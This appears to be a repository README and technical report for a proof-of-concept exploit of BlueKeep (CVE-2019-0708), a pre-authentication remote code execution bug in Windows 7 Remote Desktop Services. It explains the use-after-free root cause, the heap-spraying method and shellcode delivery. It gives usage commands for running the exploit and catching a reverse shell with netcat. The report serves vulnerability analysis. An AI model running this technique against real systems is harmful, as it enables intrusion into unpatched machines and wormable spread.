CVE-2019-0708 (BlueKeep) pre-auth RCE POC on Windows7

This repository demonstrates the remote code execution bug in Windows Remote Desktop Services (RDS).

Here is a POC code and technical report about BlueKeep vulnerability, which we developed before.
NOTE: Our goal is helping analysts to get better understanding about critical vulnerabilities.

How to use

Prerequisites

Our exploit code is written in Python 3, and relies on PyRDP library. Please set up them following the installation guide of PyRDP.

Usage

Currently our exploit targets, and is tested on, Windows 7 SP 1(6.1.7601) x64 on Virtual Box.

If your computer has the IP address 192.168.56.1 and you target the RDP server at example.com:1234, then type

$ python exploit.py example.com -rp 1234 192.168.56.1

If the script successfully exploits the server, a connect-back shellcode initiates a TCP connection from the server back to 192.168.56.1:4444. Therefore, for example you should wait for the connection with netcat:

$ nc -v -l 4444

If you want to change the port number to which the server connect back, use the -bp option:

$ python exploit.py example.com -rp 1234 192.168.56.1 -bp 4567

Report

The Vulnerability

In the May 2019, Microsoft disclosed a critical Remote Code Execution vulnerability CVE-2019-0708, in Remote Desktop Services (formerly known as Terminal Services). This vulnerability is pre-authentication -- meaning the vulnerability is wormable, with the potential to cause widespread disruption. Attacker can exploit this vulnerability by sending crafted Remote Desktop Protocol (RDP) messages to the target server and get arbitrary code execution with administrative privileges.

RDP Virtual Channel

Microsoft Remote Desktop Services provides a user with open interactive Windows sessions remotely. It presents the user's Windows desktop by communicating with the user client using Remote Desktop Protocol (RDP) over port 3389/TCP.

The RDP protocol has the ability to be enhanced through software extensions called Virtual Channel. Example of functional enhancements might include: support for special types of hardware, audio, or other additions to the core functionality.
These channels include standard Microsoft-supposed channels such as "rdpdr" (Redirection), "rdpsnd"(Sound), "cliprdr" (Clipboard sharing) etc. Users can write modules using the RDP API to support other channels. In addition to the above channels, Microsoft creates two channels by default: MS_T120 (used for RDP itself) and CTXTW (used in Citrix ICA).

The vulnerability is related to virtual channels binding process of MS_T120 through "MCS Connect Initial and GCC Create" request. More background information is available from ZDI.
As aforementioned in ZDI article, all virtual channels requested by client are created using termdd!IcaCreateChannel(). Then pointers to these channel structures are stored within a table, which we shall call ChannelPointerTable.
When a connection is established with RDP client, all static virtual channels including MS_T120 are initialized internally by Windows RDP server and pointed by ChannelPointerTable.

The query to create MS_T120 and CTXTW is issued by rdpcore!WDLIB_IcaVirtualQueryBindings().

Fig .1: Generation of the query for creating MS_T120 and CTXTW

After the query is passed to termdd!IcaBindVirtualChannels(), a virtual channel structure is created in termdd!IcaAllocateChannel() and registered to ChannelPointerTable.

Fig .2: Creating and registering virtual channel structure

The function routine termdd!IcaBindChannel() is responsible for registering a virtual channel structure to ChannelPointerTable.
Here is the stack trace on Windows 7 x64, when termdd!IcaBindChannel() is called with the first argument "MS_T120" and the third argument 0x1f.

Fig .3: MS_T1209 is binded to slot 0x1f during intial request

Then ChannelPointerTable looks as follows. Note that MS_T120 is always present in Slot 0x1F.

Fig .4: ChannelPointerTable during intial request

Root cause Analysis

A use-after-free vulnerability exists in Windows RDP kernel driver, termdd.sys.
A problem is that when client specify channel with name MS_T120\x00 during "MCS Connect Initial and GCC Create", termdd!IcaCreateChannel() calls termdd!IcaFindChannelByName() and returns the existing MS_T120 channel structure in Slot 0x1F. Then this channel structure is considered as a new virtual channel entry and stored in other Slot (in this example, Slot 2) during "MCS Attach User Request".
Here is the stack trace on Windows 7 x64, when termdd!IcaBindChannel() is called with the first argument "MS_T120" and the third argument 0x2.

Fig .5: MS_T1209 is also binded to slot 0x2 during attach request

In other words, MS_T120 channel structure is pointed by two slots 0x1F and 0x2.

Fig .6: ChannelPointerTable during attach request

If an attacker then sends invalid data into the MS_T120 channel, termdd.sys close the channel using termdd!IcaCloseChannel(), clears the pointer at the slot.(Slot 2 in the running example)
However, the same pointer in Slot 0x1F isn't cleared.
Subsequently, when the connection terminates, RDPWD!HandleDisconnectProviderUlt() is invoked, which in turn calls termdd!IcaChannelInputInternal() and attempts to destruct freed MS_T1209 channel structure again using the pointer at Slot 0x1F. A destruction procedure is invoked by vtable pointer within channel structure. This leads to a use-after-free condition.

Fig .7: vtable dereference

Heap Spraying

As explained in the previous section, RDPWD!HandleDisconnectProviderUlt() attempts to call a function from the vtable pointer within the freed channel structure. If an attacker can control values in the channel structure, he can overwrite the vtable pointer, which leads to arbitrary code execution with kernel privileges.
In order to realize this, however, there are two difficulties to overcome.

One is how to control values in the freed channel structure in the first place. To this end, it is typical and steady for an attacker to allocate memory in the same location as the freed structure lies, since the targeted vulnerability is use-after-free.
However, in this case there is no deterministic way for him to allocate his memory in the target location as he wishes. This is because, in the kernel, many threads run and allocate memory (virtually) simultaneously. Where his memory will be allocated is dependent on in what order threads run. In almost all cases, he cannot be certain whether he made a successful allocation.

The other one is where to set the addresses of the vtable and the pointers in it. As seen in the previous section, an attacker is required to set the address of the vtable. Since he wants to gain arbitrary code execution, he should set the address so that the faked vtable contains the address which he wants to be executed(e.g. the address of a shellcode or some gadget). However, almost certainly he cannot know such an suitable address due to the aforementioned randomness of the kernel heap and KASLR:

Probably he can allocate memory in the kernel heap and write the address of a shellcode into the allocated memory location. Nevertheless usually he cannot learn the address of the allocated place, due to the randomness as noted above.
This is unlikely, but the other option is to use static(non-heap) memory locations which contain an address of useful gadgets by chance, like somewhere in the code section. However, this plan would not work well either because Windows 7 has the mitigation KASLR, which randomizes the addresses of those memory locations

These facts mean an attacker cannot directly gain arbitrary code execution even if he can control the vtable pointer, unless he utilizes another vulnerability which leaks addresses in the kernel. Moreover, as you may notice, “the address of a shellcode or some gadget” is also what an attacker cannot know.

Our exploit deals with these obstacles by a sole technique: heap spraying. Heap spraying is a method to break those randomness, making a large number of allocations of a large amount of memory.

Fig .8: Usage of heap pool before spraying

Fig .9: Usage of heap pool after spraying

Repeating crafted allocation a lot of times, an attacker can increase the probability that some of the allocated memory is situated in the location of the freed channel structure.

If the majority of objects in the kernel heap are ones prepared by an attacker, then he can even carelessly specify some address in the heap as the address of the faked vtable because the specified address is highly likely to point at his objects. We note that the base address of the kernel heap is not randomized by KASLR. Basically the randomness of the heap comes only from the order of thread execution.

Fortunately and most importantly, in Windows 7, NX bit is not enabled in the non-paged kernel pool. This means an attacker can store in the kernel heap, not only the faked vtable, but also a shellcode directly. This makes exploitation much easier since we do not need to employ return-oriented programming.

Fig .10: Page Table Entry (PTE) permission

For heap spraying, obviously an attacker needs the functionality allowing him to allocate memory in the kernel heap and to give an input into it. Based on the report of Unit 42 and BlueKeep exploit in Metasploit, we searched kernel drivers for routines which provide that functionality. We have tested many PDUs and finally concluded that the most reliable and useful way is to send Virtual Channel PDU to rdpsnd channel as the exploit of Metasploit makes use of. For your reference, let us explain why we could not adopt three types of PDU introduced in the report of Unit 42:

Bitmap Cache PDU: first of all, an attacker can send this PDU only during the first handshake. Because use-after-free occurs after the handshake finishes, this cannot be used for overwriting the vtable. Moreover, with that PDU, an attacker can allocate only 0x2b5240 bytes (< 3MB) of memory, which are not enough for heap spraying.
Client Name Request PDU: we thought this PDU was promising for heap spraying. As far as we tested, however, this PDU cannot be sent(or received) multiple times at least in a straightforward way. Due to the lack of details, we could not find out which is the fact this result means: that an attacker needs to send crafted and complicated packets in order to utilize this PDU, or that this routine has changed and does not work in a 64-bit environment.
Refresh Rect PDU: this PDU is efficient for heap spraying in the point that an attacker can allocate a much larger amount of memory than the size of data he actually sends. However, since an attacker can control only 8 bytes of data in the memory allocated by this PDU, it is difficult to make meaningful use of this allocation. We omit the details, but we think at least 13 bytes(8 bytes for vtable and 5 bytes for “jmp $+0x1000”) of data should be able to be controlled in order for an attacker to effectively use this kind of PDU.

Virtual Channel PDU is, as its name suggests, exchanged by client and server to transport data to static virtual channels. As for how the data inside the PDU will be processed, it varies by channel. Among several well-known channels Microsoft provides as extensions, rdpsnd channel has the unique feature of receiving any input and allocating memory for it. Since this channel can be used by default in Windows 7, we can simply send our payloads to it for heap spraying.

We wrote a proof of concept with above-mentioned important points in mind, and successfully achieved arbitrary code execution.

Fig .11: Controlled vtable address

Fig .12: Succeeded to overwrite vtable address with malicious one pointing shellcode (ud2)

Code Execution

Although we described how to get a shellcode executed in the previous section, actually that is not all. The shellcode runs in the kernel land while what an attacker wants is administrative privileges in “userland”. They are theoretically similar in what he can do with it, but different in how he can realize actions he wants to do with it. For instance, with a shellcode, an attacker may need to write a hundred lines of assembly code to list files in some directory, whereas he can just type ‘dir’ with a privileged shell.

Thus, the goal of our exploit is to provide a privileged shell for an attacker, and that takes some more efforts to realize. Since the shellcode is executed in kernel land, firstly the shellcode needs to find or create a (privileged) userland thread, and then execute cmd.exe in that thread. This time we need to think about two matters: how to find or create a thread, and how to allocate memory in userland for executing shellcode in userland.

The former matter of finding a userland thread arises due to the fact that the context where the shellcode runs is not a usual process context. If it is running within a process context, it can just use the IRET instruction to return to userland. However, in this case executing IRET causes the kernel to freeze. There are several ways to resolve this issue, but among those ways, the most general and useful method is asynchronous procedure call(APC), the mechanism Windows provides for processing asynchronous events. APC allows a program to execute functions in a specified thread context even of a different process. With this mechanism, the shellcode can easily and legitimately create a new userland thread.

When registering APC, we need to specify the address from which a new userland thread starts execution. However, so far we allocate memory only in the kernel heap, which a userland thread clearly cannot access. In order to make a userland shellcode executed, we must prepare another memory location which can be seen from userland, and store the userland shellcode there. Thus, we encounter the latter matter of allocating memory in userland. One possible and normal way to deal with this issue is creating a new mapping with ZwAllocateVirtualMemory. This is, however, a little bit redundant, and actually there is an easier way in Windows 7: using KUSER_SHARED_DATA. KUSER_SHARED_DATA is a data structure stored in the dedicated mapping, which is mapped in both of userland and kernel land, and is located at the fixed address(0x7FFE0000 and 0xFFFFF78000000000, respectively). This is a feature similar to vsyscall in Linux. If we store the userland shellcode in this mapping, everything goes well: the kernel-land shellcode can copy the userland shellcode into this mapping, and register APC with no difficulty since it knows the address of the mapping.

Fig .13: Shellcode is stored in the dedicated mapping, 0x7FFE0000(usermode) and 0xFFFFF78000000000(kernelmode)

Fig .14: A body of Shellcode

Thus, there are lots of things to do after getting arbitrary code execution although all of those things can be almost straightforwardly solved. Finally, our exploit accomplished its aim.

Affected Version

This vulnerability is assigned a CVE number, CVE-2019-0708. Microsoft has already published a security patch KB4499175 in 2019.5.15.
You can see more detail about the vulnerability, affected version and mitigation here.

Acknowledgement

This project was partially supported by Advanced Technology Lab, Recruit Co.,Ltd.

yassineaboukir / CVE-2019-0708